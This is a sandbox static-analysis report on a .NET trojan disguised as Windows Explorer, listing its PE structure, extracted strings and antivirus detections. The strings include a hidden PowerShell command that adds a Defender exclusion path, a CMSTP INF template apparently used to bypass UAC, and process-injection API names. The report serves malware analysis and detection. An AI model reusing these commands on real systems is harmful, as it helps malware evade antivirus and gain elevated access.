Static | ZeroBOX

PE Compile Time

2086-10-09 13:49:16

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0001cd74 0x0001ce00 6.65321368451
.rsrc 0x00020000 0x0000cfe4 0x0000d000 5.03339764988
.reloc 0x0002e000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0002c58c 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x0002c9f4 0x00000076 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0002ca6c 0x0000038c LANG_ENGLISH SUBLANG_ENGLISH_US PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST 0x0002cdf8 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Z?_d
_b`*
v4.0.30319
#Strings
explorer
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
mscorlib
System
Boolean
RuntimeCompatibilityAttribute
DebuggableAttribute
System.Diagnostics
DebuggingModes
AssemblyTitleAttribute
System.Reflection
String
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
AssemblyConfigurationAttribute
AssemblyDelaySignAttribute
AssemblyKeyFileAttribute
SuppressIldasmAttribute
AssemblyKeyNameAttribute
explorer.exe
<Module>
qQ3WF2gCh1ZHTn60qq
JW2emer4t6lhWQOc2g
ConsoleApplicationBase
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic
aEZpg8Y2Uxcs6wS2GI
Ul0gre5SPvrpJXIAjF
Computer
Microsoft.VisualBasic.Devices
NL9mToBaq2PfygVhxy
V9lutgCY55X5c1CMyU
Object
FxPVCuWHdii6yWCOs4
nCEyIEHVunCqaYMfLt
l8yo5NT7O4jVN8fDVO`1
eApKf1eulqhKcyv0HS
EdXOFs3GVb1CDwYZMR
MySettings
explorer.My
ApplicationSettingsBase
System.Configuration
MySettingsProperty
Module1
_Closure$__
<Module>{B5D91C9D-6C0D-45CB-893E-57953D309EFA}
ILLicenseModule
ztY9Q6utPvaGk18m1t
ISr3HonLJD7f7Hp8xw
usggXqDjIfAd0TvYvu
Attribute
zoJt3yVIqp2uIeSM67`1
rjYTBoGB954XkLw5M4
ll5KH9OWXh715iAuDL
hQv1eMmLE5rGjoldo7
U7HywK41omLvoj6vyy
IN7dhU8i1tQYN75Bqe
nE1TWn9xfaVlDLyCOM
XAk686iDR8996gX2q4
<PrivateImplementationDetails>{BF7ED14C-BEEB-4087-9AD8-A1EDA58F7F61}
__StaticArrayInitTypeSize=256
ValueType
__StaticArrayInitTypeSize=32
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=18
aVhTxyN9l
ktguY55X5
Y1CnMyUBA
NKfD1ulqh
xcyVv0HSd
.cctor
qQ3gWF2Ch
xO4SjVN8f
GAWY2eme4
QgfBEZpg8
PGIe0l0gr
DAjWFpL9m
SZHrTn60q
S6l5hWQOc
QUxCcs6wS
fSP3vrpJX
joaHq2Pfy
ti64yWCOs
Hashtable
System.Collections
EXOGFsGVb
System.Windows.Forms
Instance
TargetInvocationException
Control
get_IsDisposed
GetTypeFromHandle
RuntimeTypeHandle
ContainsKey
Microsoft.VisualBasic.CompilerServices
GetResourceString
InvalidOperationException
Activator
CreateInstance
ProjectData
SetProjectError
Exception
get_InnerException
get_Message
Remove
SCDOwYZMR
Component
System.ComponentModel
Dispose
Equals
RuntimeHelpers
GetObjectValue
GetHashCode
FxPmVCuHd
ToString
qVC8EyIEV
knC9qaYMf
instance
utni8yo5N
LtPsvaGk1
resourceMan
ResourceManager
System.Resources
resourceCulture
CultureInfo
System.Globalization
get_ResourceManager
ReferenceEquals
get_Assembly
Assembly
get_Culture
set_Culture
get_explorer
GetObject
get_InfData
GetString
get_version
Culture
InfData
version
defaultInstance
SettingsBase
Synchronized
get_Default
Default
get_Settings
Settings
List`1
System.Collections.Generic
BinaryPath
ShowWindow
IntPtr
nCmdShow
user32.dll
SetForegroundWindow
Environment
GetFolderPath
SpecialFolder
Concat
System.IO
Exists
WriteAllBytes
SetAttributes
FileAttributes
AppDomain
get_CurrentDomain
Versioned
CallByName
CallType
GetAppDataPath
Random
lenght
StringBuilder
System.Text
VBMath
Randomize
ToCharArray
Single
Conversion
Double
Append
CheckOSlist
Predicate`1
GetWindowsName
Registry
Microsoft.Win32
GetValue
SetInfFile
CommandToExecute
GetRandomFileName
Convert
ToChar
GetEnvironmentVariable
Replace
WriteAllText
SetWindowActive
ProcessName
Process
GetProcessesByName
Refresh
get_MainWindowHandle
op_Equality
UACstatus
Conversions
ToInteger
TTTTTTT
command
ProcessStartInfo
set_Arguments
set_UseShellExecute
set_CreateNoWindow
set_WindowStyle
ProcessWindowStyle
SendKeys
SendWait
ClearProjectError
TripleDESDecrypt
TripleDESCryptoServiceProvider
System.Security.Cryptography
MD5CryptoServiceProvider
Encoding
get_BigEndianUnicode
GetBytes
HashAlgorithm
ComputeHash
TripleDES
set_Key
SymmetricAlgorithm
set_Mode
CipherMode
CreateDecryptor
ICryptoTransform
TransformFinalBlock
MemoryStream
Stream
GZipStream
System.IO.Compression
CompressionMode
NewLateBinding
LateGet
Operators
SubtractObject
LateSet
LateCall
ChangeType
BitConverter
ToInt32
_Lambda$__9-0
Contains
AbkgfKdM5B
UInt32
mNkggyB4dW
I07grmmH8T
CH9gY5XavZ
Kl6g5WvTBf
qJMgBIpOY1
mYJgC5Kbl3
tfBgeaWdlb
yHwg32oTet
cNKgWbGiIE
g0BgHNrfRc
N9agT5tYia
qEggudDosl
o02gnkKjpn
d89gD1LbCG
InitializeArray
RuntimeFieldHandle
leHifFIJCLsZtKEFfM1i
qm1wtbSr3
UInt64
ioL7JD7f7
UInt16
jp8KxwLsg
bXqJjIfAd
UTvkYvuko
zt3MyIqp2
kIeaSM679
VYTZBoB95
RijndaelManaged
GetType
GetMethod
MethodInfo
BindingFlags
MethodBase
Invoke
pXkQLw5M4
AesCryptoServiceProvider
System.Core
ll5IKH9WX
X71d5iAuD
BinaryReader
CryptoStream
GetName
AssemblyName
GetPublicKeyToken
get_BaseStream
set_Position
FlushFinalBlock
ToArray
get_Length
ReadBytes
GetManifestResourceStream
CryptoStreamMode
G5rEGjold
get_Unicode
L7Nq7HywK
FromBase64String
SombLvoj6
VirtualProtect
kernel32.dll
RyyXXN7dh
Pi1AtQYN7
get_Location
get_CodeBase
GetProperty
PropertyInfo
dBqyeGE1T
WriteProcessMemory
hnxofaVlD
ReadProcessMemory
uyC6OMhAk
OpenProcess
L86PDR899
CloseHandle
LgXp2q44o
FileStream
FileMode
FileAccess
FileShare
IDisposable
vOllXm9WF
set_IV
AtDUlf9ZD
h7q262Blx
RA1v3yHSS
EAXtChYwN
q2s1HQ6sm
n2yF9lfCi
LIe02kdPL
qHuNJqVlK
f3GjFX1gG
l4SxBNHH8
NbMh1y80h
kEocCQ94J
HtJzZrZOf
CreateEncryptor
ToBase64String
cYm95A4ui0cY93qYkk
OjaXNZLbLSvIuolnPF
Hf0Sqdcs9QsXEPiyfZ
bPL0HGwwotchRdKdN7
value__
cWJgGXFTPJ
SLV0fFIsptsZtjvFft17
MessageBox
DialogResult
oGDgVdyyW7
Vk1gOBUbTL
ModuleHandle
e53w34m968awCm9P85taUZe
GetRuntimeTypeHandleFromMetadataToken
q3oMVe54wE47w4v68C7s2I
GetRuntimeFieldHandleFromMetadataToken
GetModules
Module
get_ModuleHandle
YUagk2bcl3
B8ngM94MdJ
OIEgaqqRHx
HrBgZuNP1G
ubNgmvhiPJ
hUFg4m9qsI
QXug9ladpd
PykgiWPgtl
QrlgL40d1J
F4OgsIAWNU
Xbkg7sFYyN
t0dgKh2bDs
$$method0x6000002-1
$$method0x600001c-1
$$method0x600001c-2
$$method0x600002a-1
$$method0x60000a2-1
Dictionary`2
$$method0x6000208-1
explorer.Resources.resources
explorer.g.resources
a665dd4b-e205-4c52-a50c-914464044fc2
93f557a6-b1bc-4d95-89c9-2008c185be86
GeneratedCodeAttribute
System.CodeDom.Compiler
EditorBrowsableAttribute
EditorBrowsableState
DebuggerHiddenAttribute
StandardModuleAttribute
HideModuleNameAttribute
HelpKeywordAttribute
System.ComponentModel.Design
DebuggerNonUserCodeAttribute
CompilerGeneratedAttribute
STAThreadAttribute
MyGroupCollectionAttribute
ThreadStaticAttribute
FlagsAttribute
AttributeUsageAttribute
AttributeTargets
WrapNonExceptionThrows
explorer
Copyright
2024
$1af2b9fb-72c2-48af-8e25-4d1fe398fbc4
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
MyTemplate
11.0.0.0
My.Computer
My.Application
My.User
My.Forms
My.WebServices
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
17.7.0.0
My.Settings
System.Windows.Forms.Form
Create__Instance__
Dispose__Instance__
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
ISr3HonLJD7f7Hp8xw.ztY9Q6utPvaGk18m1t+usggXqDjIfAd0TvYvu+zoJt3yVIqp2uIeSM67`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][]
AllowMultiple
Inherited
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPn
?~|?"
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v2.0.50727
#Strings
ThreadSafeObjectProvider`1
Module1
get_String1
get_UTF8
<Module>
Dispose__Instance__
Create__Instance__
ProjectData
mscorlib
Microsoft.VisualBasic
get_IsDisposed
m_FormBeingCreated
Synchronized
CreateInstance
get_GetInstance
defaultInstance
instance
GetHashCode
get_Message
Hashtable
RuntimeTypeHandle
GetTypeFromHandle
set_WindowStyle
ProcessWindowStyle
set_FileName
GetType
get_Culture
set_Culture
resourceCulture
ConsoleApplicationBase
ApplicationSettingsBase
Dispose
EditorBrowsableState
ThreadStaticAttribute
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
HelpKeywordAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
HideModuleNameAttribute
AssemblyTrademarkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
MyGroupCollectionAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
m_ThreadStaticValue
GetObjectValue
Remove
version.exe
ggggggg
Encoding
FromBase64String
GetResourceString
ToString
GetString
GetFolderPath
System.ComponentModel
Control
System
resourceMan
System.ComponentModel.Design
version
get_Application
MyApplication
System.Configuration
System.Globalization
System.Reflection
TargetInvocationException
InvalidOperationException
get_InnerException
CultureInfo
ProcessStartInfo
m_AppObjectProvider
m_UserObjectProvider
m_ComputerObjectProvider
m_MyWebServicesObjectProvider
m_MyFormsObjectProvider
SpecialFolder
get_ResourceManager
System.CodeDom.Compiler
get_User
get_Computer
MyComputer
SetProjectError
Activator
.cctor
System.Diagnostics
Microsoft.VisualBasic.Devices
get_WebServices
MyWebServices
Microsoft.VisualBasic.ApplicationServices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
version.My.Resources
version.Resources.resources
DebuggingModes
get_Settings
MySettings
ReferenceEquals
System.Windows.Forms
get_Forms
MyForms
System.Collections
RuntimeHelpers
Process
set_Arguments
Concat
Object
MyProject
get_Default
Environment
Component
Convert
System.Text
version.My
ContainsKey
get_Assembly
MySettingsProperty
WrapNonExceptionThrows
WindowsApp7
Copyright
2023
$23b8ab7e-3863-4df6-8d35-9e482478f954
1.0.0.0
MyTemplate
11.0.0.0
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
17.7.0.0
System.Windows.Forms.Form
Create__Instance__
Dispose__Instance__
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
My.Computer
My.Application
My.User
My.Forms
My.WebServices
My.Settings
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPa
/c PowerShell.exe -windowstyle hidden Set-MpPreference -/c PowerShell.exe -windowstyle hidden Set-MpPreference -ExclusionPath "%APPDATA%\Microsoft\Windows"
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
REPLACE_COMMAND_LINE
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
[Strings]
ServiceName=""""
ShortSvcName=""""
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
v\2y Zt1{
:x/Z_W
Rfhn M
_CorExeMain
mscoree.dll
$vox_e
:q%(5u
gj$Glkz
O`o~-^8s
s9dC9|
O9})pQa
S}di.^
;.hjZ0vl
Ta*@hf
v;I4ol;s?R
C{O:o][
A3ZA\b0
~w~7+C
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
)S71SDASXQSXYSXaSXiSXqSXyS{
S7$S7,S7
S7TS7T
.#J.+].
;.3].K].S].;J.Cc@
System.Security.Cryptography.CryptoConfig
get_AllowOnlyFipsAlgorithms
93f557a6-b1bc-4d95-89c9-2008c185be86
a665dd4b-e205-4c52-a50c-914464044fc2
{11111-22222-10009-11112}
file:///
Location
{11111-22222-30001-00001}
{11111-22222-30001-00002}
{11111-22222-40001-00001}
{11111-22222-40001-00002}
{11111-22222-50001-00001}
{11111-22222-50001-00002}
{11111-22222-60001-00001}
{11111-22222-60001-00002}
explorer
version
InfData
version.Resources
String1
XE1pY3Jvc29mdFxXaW5kb3dzXA==
L2MgUG93ZXJTaGVsbC5leGUgLXdpbmRvd3N0eWxlIGhpZGRlbiBBZGQtTXBwcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoIA==
ZXhwbG9yZXIuZXhl
Q29ydGFuYS5leGU=
T25lRHJpdmUuZXhl
VGVtcGxhdGVzXHN2Y2hvc3QuZXhl
U3lzdGVtU2V0dGluZ3MuZXhl
VGFza21nci5leGU=
Y21kLmV4ZQ==
WinForms_RecursiveFormCreate
WinForms_SeeInnerException
String1
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
WindowsApp7
FileVersion
1.0.0.0
InternalName
version.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
version.exe
ProductName
WindowsApp7
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Windows Explorer
FileVersion
10.0.22621.2283 (WinBuild.160101.0800)
InternalName
explorer
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
EXPLORER.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.22621.2283
VarFileInfo
Translation
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Fsysna.4!c
tehtris Generic.Malware
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Clean
Cylance unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 005ac6131 )
Alibaba Trojan:MSIL/Fsysna.dd3479b6
K7GW Trojan ( 005ac6131 )
Cybereason malicious.74123f
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Injector.WID
APEX Malicious
Avast Win32:RATX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.MSIL.Fsysna.gen
BitDefender Gen:Heur.MSIL.Krypt.!cdmip!.2
NANO-Antivirus Trojan.Win32.Fsysna.khtyau
ViRobot Clean
MicroWorld-eScan Gen:Heur.MSIL.Krypt.!cdmip!.2
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Agent.nyubf
DrWeb Trojan.PackedNET.274
VIPRE Gen:Heur.MSIL.Krypt.!cdmip!.2
TrendMicro TROJ_GEN.R002C0XAO24
Trapmine malicious.high.ml.score
FireEye Generic.mg.438817d3938ae575
Emsisoft Gen:Heur.MSIL.Krypt.!cdmip!.2 (B)
SentinelOne Static AI - Malicious PE
GData Gen:Heur.MSIL.Krypt.!cdmip!.2
Jiangmin Clean
Webroot Clean
Varist W32/ABRisk.BXWO-1825
Avira TR/Agent.nyubf
Antiy-AVL Trojan/MSIL.Fsysna
Kingsoft malware.kb.c.996
Gridinsoft Ransom.Win32.Sabsik.sa
Xcitium Clean
Arcabit Trojan.MSIL.Krypt.!cdmip!.2
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Fsysna.gen
Microsoft Trojan:Win32/Phonzy.A!ml
Google Detected
AhnLab-V3 Backdoor/Win.REVENGERAT.R634026
Acronis Clean
McAfee Artemis!438817D3938A
MAX malware (ai score=83)
Malwarebytes Trojan.Injector.MSIL
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0XAO24
Tencent Malware.Win32.Gencirc.13fe3911
Yandex Clean
Ikarus Trojan.MSIL.Agent
MaxSecure Trojan.Malware.73694066.susgen
Fortinet Clean
BitDefenderTheta Gen:NN.ZemsilF.36744.km0@aWBc1Ehi
AVG Win32:RATX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
No IRMA results available.